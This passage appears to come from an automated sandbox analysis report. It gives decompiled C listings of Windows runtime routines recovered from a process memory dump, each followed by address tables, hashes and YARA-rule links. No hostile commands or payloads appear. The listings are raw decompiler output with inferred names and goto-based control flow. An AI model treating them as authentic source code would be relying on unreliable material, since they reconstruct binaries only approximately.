																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L02B2FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L02B070F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E02B2FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E02B2FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E02B2FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E02B2FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E02B2FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x2be7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x2be7b84 = _t75;
						_t73 = E02B0EB70(_t134, 0x2be7b60);
						if( *0x2be7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E02B0FF60( *0x2be7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                        0x02b2fab0
                        0x02b2fab2
                        0x02b2fab3
                        0x02b2fab4
                        0x02b2fabc
                        0x02b2fac0
                        0x02b2fb14
                        0x02b2fb17
                        0x02b2fac2
                        0x02b2fac8
                        0x02b2facd
                        0x02b2fad3
                        0x02b2fad3
                        0x02b2fadd
                        0x02b2fb18
                        0x02b2fb1b
                        0x02b2fb1d
                        0x02b2fb1e
                        0x02b2fb1f
                        0x02b2fb20
                        0x02b2fb21
                        0x02b2fb22
                        0x02b2fb23
                        0x02b2fb24
                        0x02b2fb25
                        0x02b2fb26
                        0x02b2fb27
                        0x02b2fb28
                        0x02b2fb29
                        0x02b2fb2a
                        0x02b2fb2b
                        0x02b2fb2c
                        0x02b2fb2d
                        0x02b2fb2e
                        0x02b2fb2f
                        0x02b2fb3a
                        0x02b2fb3b
                        0x02b2fb3e
                        0x02b2fb41
                        0x02b2fb44
                        0x02b2fb47
                        0x02b2fb4a
                        0x02b2fb4d
                        0x02b2fb53
                        0x02b6bdcb
                        0x02b6bdcb
                        0x02b2fb59
                        0x02b2fb5b
                        0x02b2fb5b
                        0x02b2fb5e
                        0x02b6bdd5
                        0x02b6bdd8
                        0x00000000
                        0x02b6bdda
                        0x00000000
                        0x02b6bdda
                        0x02b2fb64
                        0x02b2fb64
                        0x02b2fb64
                        0x02b2fb67
                        0x02b2fb6e
                        0x02b2fb70
                        0x02b2fb72
                        0x00000000
                        0x02b2fb78
                        0x02b2fb7a
                        0x02b2fb7a
                        0x02b2fb7d
                        0x02b2fb80
                        0x02b6bddf
                        0x02b6bde1
                        0x00000000
                        0x02b6bde3
                        0x00000000
                        0x02b6bde3
                        0x02b2fb86
                        0x02b2fb86
                        0x02b2fb86
                        0x02b2fb8b
                        0x02b2fb90
                        0x02b2fb92
                        0x02b2fb94
                        0x02b2fb9a
                        0x02b2fb9b
                        0x02b2fba1
                        0x02b6bde8
                        0x02b6bdeb
                        0x02b6bded
                        0x02b6beb5
                        0x02b6beb5
                        0x02b6bebb
                        0x02b6bebd
                        0x02b6bec3
                        0x02b6bed2
                        0x02b6bedd
                        0x02b6bedd
                        0x02b6beed
                        0x00000000
                        0x02b6bdf3
                        0x02b6bdfe
                        0x02b6be06
                        0x02b6be0b
                        0x02b6be0d
                        0x02b6be0f
                        0x02b6be14
                        0x02b6be19
                        0x02b6be20
                        0x02b6be25
                        0x02b6be27
                        0x02b6be35
                        0x02b6be39
                        0x02b6be46
                        0x02b6be4f
                        0x02b6be54
                        0x02b6be56
                        0x02b6bef8
                        0x02b6bef8
                        0x00000000
                        0x02b6be5c
                        0x02b6be5c
                        0x02b6be60
                        0x00000000
                        0x02b6be66
                        0x02b6be66
                        0x02b6be7f
                        0x02b6be84
                        0x02b6be87
                        0x02b6be89
                        0x02b6be8b
                        0x02b6be99
                        0x02b6be9d
                        0x02b6bea0
                        0x02b6beac
                        0x02b6beaf
                        0x02b6beb1
                        0x02b6beb3
                        0x02b6beb3
                        0x00000000
                        0x02b6bea2
                        0x02b6bea2
                        0x00000000
                        0x02b6bea2
                        0x02b6be8d
                        0x02b6be8d
                        0x02b6be92
                        0x00000000
                        0x02b6be92
                        0x02b6be8b
                        0x02b6be60
                        0x02b6be3b
                        0x02b6be3b
                        0x02b6be3e
                        0x00000000
                        0x02b6be40
                        0x02b6be40
                        0x02b6be44
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b6be44
                        0x02b6be3e
                        0x02b6be29
                        0x02b6be29
                        0x00000000
                        0x02b6be29
                        0x02b6be27
                        0x00000000
                        0x02b2fba7
                        0x02b2fba7
                        0x02b2fbab
                        0x02b6bf02
                        0x02b2fbb1
                        0x02b2fbb1
                        0x02b2fbb8
                        0x02b2fbbd
                        0x02b2fbbd
                        0x02b2fbbf
                        0x02b2fbbf
                        0x02b2fbc5
                        0x02b2fbcb
                        0x02b2fbf8
                        0x02b2fbf8
                        0x02b2fbfa
                        0x00000000
                        0x02b2fc00
                        0x02b2fc00
                        0x02b2fc03
                        0x00000000
                        0x02b2fc09
                        0x02b2fc09
                        0x02b2fc0f
                        0x02b2fc15
                        0x02b2fc23
                        0x02b2fc23
                        0x02b2fc25
                        0x02b2fc27
                        0x02b2fc75
                        0x02b2fc7c
                        0x02b2fc84
                        0x00000000
                        0x02b2fc29
                        0x02b2fc29
                        0x02b2fc2d
                        0x02b2fc30
                        0x02b6bf0f
                        0x00000000
                        0x02b2fc36
                        0x02b2fc38
                        0x02b2fc3b
                        0x02b2fc41
                        0x02b6bf17
                        0x02b6bf19
                        0x02b6bf48
                        0x02b6bf4b
                        0x00000000
                        0x02b6bf1b
                        0x02b6bf22
                        0x02b6bf24
                        0x02b6bf26
                        0x00000000
                        0x02b6bf2c
                        0x02b6bf37
                        0x02b6bf39
                        0x02b6bf3b
                        0x00000000
                        0x02b6bf41
                        0x02b6bf41
                        0x02b6bf41
                        0x02b6bf41
                        0x02b6bf45
                        0x00000000
                        0x02b6bf45
                        0x02b6bf3b
                        0x02b6bf26
                        0x00000000
                        0x02b2fc47
                        0x02b2fc47
                        0x02b2fc49
                        0x02b2fcb2
                        0x02b2fcb4
                        0x02b2fcb6
                        0x02b2fcdc
                        0x02b2fcdc
                        0x00000000
                        0x02b2fcb8
                        0x02b2fcc3
                        0x02b2fcc5
                        0x02b2fcc7
                        0x00000000
                        0x02b2fcc9
                        0x02b2fcc9
                        0x02b2fccd
                        0x00000000
                        0x02b2fccd
                        0x02b2fcc7
                        0x00000000
                        0x02b2fc4b
                        0x02b2fc4b
                        0x02b2fc4e
                        0x02b2fc4e
                        0x02b2fc51
                        0x02b2fc51
                        0x02b2fc54
                        0x02b2fc5a
                        0x02b2fc5c
                        0x02b2fc5f
                        0x02b2fc61
                        0x02b2fc63
                        0x02b2fc65
                        0x02b2fc67
                        0x02b2fc6e
                        0x02b2fc72
                        0x02b2fc72
                        0x02b2fc72
                        0x02b2fc72
                        0x02b2fc67
                        0x02b2fc61
                        0x00000000
                        0x02b2fc5a
                        0x02b2fc49
                        0x02b2fc41
                        0x02b2fc30
                        0x02b2fc27
                        0x02b2fc03
                        0x02b2fbcd
                        0x02b2fbd3
                        0x02b2fbd9
                        0x02b2fbdc
                        0x02b2fbde
                        0x02b2fc99
                        0x02b2fc9b
                        0x02b2fc9d
                        0x02b2fcd5
                        0x02b2fcd5
                        0x02b2fc89
                        0x02b2fc89
                        0x00000000
                        0x02b2fc9f
                        0x02b2fc9f
                        0x02b2fca3
                        0x00000000
                        0x02b2fca3
                        0x00000000
                        0x02b2fbe4
                        0x02b2fbe4
                        0x02b2fbe4
                        0x02b2fbe4
                        0x02b2fbe9
                        0x02b2fbf2
                        0x00000000
                        0x02b2fbf2
                        0x02b2fbde
                        0x02b2fbcb
                        0x02b2fbab
                        0x02b2fc8b
                        0x02b2fc8b
                        0x02b2fc8c
                        0x02b2fb80
                        0x02b2fb72
                        0x02b2fb5e
                        0x02b2fc8d
                        0x02b2fc91
                        0x02b2fadf
                        0x02b2fadf
                        0x02b2fae1
                        0x02b2fae4
                        0x02b2fae7
                        0x02b2faec
                        0x02b2faf8
                        0x02b2fb00
                        0x02b2fb07
                        0x02b2fb0f
                        0x02b2fb0f
                        0x02b2fb07
                        0x00000000
                        0x02b2faf8
                        0x02b2fadd

                        Strings
                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 02B6BE0F
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                        • API String ID: 0-865735534
                        • Opcode ID: 9085f0cb1f50f56b6330e607de6ffc992866c318af256384e7b0dc1897fd56ae
                        • Instruction ID: 66d908290a3d465a4f033088097eb3a5ed6a3b1729b591b8fbeac39224e79e2b
                        • Opcode Fuzzy Hash: 9085f0cb1f50f56b6330e607de6ffc992866c318af256384e7b0dc1897fd56ae
                        • Instruction Fuzzy Hash: 94A10231B00715DBDB25DFA8C458B7AB7B5EF48718F0449E9E90ADBA90DB34D809CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AF2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                        Download Yara Rule
                        C-Code - Quality: 63%
                        			E02AF2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x2be5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x2be7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E02B397C0();
				}
				if( *0x2be79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x2be79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E02B21624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E02B17D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E02B8FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E02B39520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E02B2E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L02B4DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x2be6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x2be6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E02B39980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E02B395D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E02B17D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E02B17D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E02B77016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E02B8FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x2be5350;
							if(_t109 != 0x2be5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E02B8FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E02B85720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                        0x02af2d8a
                        0x02af2d8a
                        0x02af2d92
                        0x02af2d96
                        0x02af2d9e
                        0x02af2da0
                        0x02af2da3
                        0x02af2da5
                        0x02af2da8
                        0x02af2dab
                        0x02af2db2
                        0x02b4f9aa
                        0x02b4f9ab
                        0x02b4f9ae
                        0x02b4f9ae
                        0x02af2db8
                        0x02af2dc2
                        0x02b4f9b9
                        0x02b4f9be
                        0x02b4f9bf
                        0x02b4f9bf
                        0x02af2dcf
                        0x02b4f9c9
                        0x02af2dd5
                        0x02af2dd5
                        0x02af2dd5
                        0x02af2dde
                        0x02af2de1
                        0x02af2e70
                        0x02af2e72
                        0x02af2e72
                        0x02af2de7
                        0x02af2deb
                        0x02af2e7c
                        0x02af2e83
                        0x02af2e85
                        0x02af2e8b
                        0x02af2e8d
                        0x02af2e92
                        0x02af2e92
                        0x02af2e85
                        0x02af2df1
                        0x02af2df7
                        0x02af2df9
                        0x02af2df9
                        0x02af2dfc
                        0x02af2dff
                        0x02af2e02
                        0x00000000
                        0x02af2e05
                        0x02af2e0c
                        0x02b4f9d9
                        0x02af2e12
                        0x02af2e12
                        0x02af2e12
                        0x02af2e1a
                        0x02b4f9e3
                        0x02b4f9e9
                        0x02b4f9f0
                        0x02b4f9f6
                        0x02b4f9f8
                        0x02b4f9f8
                        0x02b4f9f0
                        0x02af2e23
                        0x02b4fa02
                        0x02b4fa03
                        0x02b4fa05
                        0x02b4fa06
                        0x00000000
                        0x02af2e29
                        0x02af2e29
                        0x02af2e2e
                        0x02af2e34
                        0x02af2e3e
                        0x00000000
                        0x00000000
                        0x02af2e44
                        0x02af2e47
                        0x02af2e4d
                        0x00000000
                        0x00000000
                        0x02af2e4f
                        0x02af2e54
                        0x00000000
                        0x00000000
                        0x02af2e5a
                        0x02af2e5f
                        0x02af2e9a
                        0x02af2ea4
                        0x02af2ea5
                        0x02af2ea8
                        0x02af2eaf
                        0x02af2eb2
                        0x02af2eb5
                        0x02b4fae9
                        0x02b4faeb
                        0x02b4faed
                        0x02b4faef
                        0x02b4faf7
                        0x02b4faf8
                        0x02b4fafd
                        0x02b4faff
                        0x02b4fb04
                        0x02b4fb04
                        0x02b4faff
                        0x02af2ec0
                        0x02af2ec4
                        0x02af2ec6
                        0x02af2ec8
                        0x02b4fb14
                        0x02b4fb18
                        0x02b4fb1e
                        0x02b4fb21
                        0x02b4fb21
                        0x02af2ece
                        0x02af2ece
                        0x02af2ece
                        0x02af2ed7
                        0x02af2e61
                        0x02af2e63
                        0x02b4fa6b
                        0x02b4fa71
                        0x02b4fa76
                        0x02b4fa78
                        0x02b4fa8a
                        0x02b4fa7a
                        0x02b4fa83
                        0x02b4fa83
                        0x02b4fa8f
                        0x02b4fa91
                        0x02b4fa97
                        0x02b4fa9d
                        0x02b4faa4
                        0x02b4faaa
                        0x02b4faaf
                        0x02b4fab1
                        0x02b4fac3
                        0x02b4fab3
                        0x02b4fabc
                        0x02b4fabc
                        0x02b4fac8
                        0x02b4facb
                        0x02b4fadf
                        0x02b4fadf
                        0x02b4facb
                        0x02b4faa4
                        0x02b4fa91
                        0x02af2e6f
                        0x02af2e6f
                        0x02af2e5f
                        0x02b4fa13
                        0x02b4fa15
                        0x02b4fa17
                        0x02b4fa1f
                        0x02b4fa21
                        0x02b4fa22
                        0x02b4fa25
                        0x02b4fa28
                        0x02b4fa2f
                        0x02b4fa2f
                        0x02b4fa2a
                        0x02b4fa2a
                        0x02b4fa2a
                        0x02b4fa31
                        0x02b4fa34
                        0x02b4fa36
                        0x02b4fa3c
                        0x02b4fa3e
                        0x02b4fa41
                        0x02b4fa43
                        0x02b4fa45
                        0x02b4fa45
                        0x02b4fa41
                        0x02b4fa3c
                        0x02b4fa4a
                        0x02b4fa4f
                        0x02b4fa51
                        0x02b4fa53
                        0x02b4fa56
                        0x02b4fa5b
                        0x02b4fa5e
                        0x00000000
                        0x02b4fa5e
                        0x02af2e23

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: RTL: Re-Waiting
                        • API String ID: 0-316354757
                        • Opcode ID: b6efa0a8658bc6ad0b233fe24152303089dfd7836c52dcc660efd61c7bc13ac6
                        • Instruction ID: 188017b4ea22def04c60d74b41a16fb5569a3a1a756b02e78e1740f4b79afe76
                        • Opcode Fuzzy Hash: b6efa0a8658bc6ad0b233fe24152303089dfd7836c52dcc660efd61c7bc13ac6
                        • Instruction Fuzzy Hash: BA613931A00644AFDB31DFA8C8C4B7EBBB5EB44714F2406E6EA25976D0DF389941DB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BC0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                        Download Yara Rule
                        C-Code - Quality: 80%
                        			E02BC0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E02BBFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E02BC1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E02B39730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E02BBA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E02BBA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x2be8b04 >> 0x14) + (_v44 -  *0x2be8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E02B17D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E02BB138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E02B17D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E02BAFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x2be8724 & 0x00000008) != 0) {
						E02BB52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E02BC15B5(0x2be8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                        0x02bc0eb7
                        0x02bc0eb9
                        0x02bc0ec0
                        0x02bc0ec2
                        0x02bc0ecd
                        0x02bc105b
                        0x02bc105b
                        0x02bc1061
                        0x02bc1066
                        0x02bc1066
                        0x02bc106b
                        0x02bc1073
                        0x02bc1073
                        0x02bc0ed3
                        0x02bc0ed6
                        0x02bc0edc
                        0x02bc0ee0
                        0x02bc0ee7
                        0x02bc0ef0
                        0x02bc0ef5
                        0x02bc0efa
                        0x02bc0efc
                        0x02bc0efd
                        0x02bc0f03
                        0x02bc0f04
                        0x02bc0f06
                        0x02bc0f07
                        0x02bc0f09
                        0x02bc0f0e
                        0x02bc0f14
                        0x02bc0f23
                        0x02bc0f2d
                        0x02bc0f34
                        0x02bc0f34
                        0x02bc0f14
                        0x02bc0f52
                        0x00000000
                        0x00000000
                        0x02bc0f58
                        0x02bc0f73
                        0x02bc0f74
                        0x02bc0f79
                        0x02bc0f7d
                        0x02bc0f80
                        0x02bc0f86
                        0x02bc0fab
                        0x02bc0fb5
                        0x02bc0fc6
                        0x02bc0fd1
                        0x02bc0fe3
                        0x02bc0fd3
                        0x02bc0fdc
                        0x02bc0fdc
                        0x02bc0feb
                        0x02bc1009
                        0x02bc1009
                        0x02bc1015
                        0x02bc1027
                        0x02bc1017
                        0x02bc1020
                        0x02bc1020
                        0x02bc102f
                        0x02bc103c
                        0x02bc103c
                        0x02bc1048
                        0x02bc1050
                        0x02bc1050
                        0x02bc1055
                        0x00000000
                        0x02bc1055
                        0x02bc0f88
                        0x02bc0f9e
                        0x02bc0fa2
                        0x02bc0fa9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bc0fa9
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: `
                        • API String ID: 0-2679148245
                        • Opcode ID: 16013813394529ba56d14131ab8c60f9c20e1d102ac1d5d5c3856a5a898cb2ec
                        • Instruction ID: 39dc2f57ac435f6fb2dd955589cffd7812e9e0a09e8c5948c9ad9dd8c089209b
                        • Opcode Fuzzy Hash: 16013813394529ba56d14131ab8c60f9c20e1d102ac1d5d5c3856a5a898cb2ec
                        • Instruction Fuzzy Hash: 4951C1712083819FD725DF28D980B2BB7E6EFC4314F1409ACF99AA7291D771E845CB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B2F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                        Download Yara Rule
                        C-Code - Quality: 75%
                        			E02B2F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
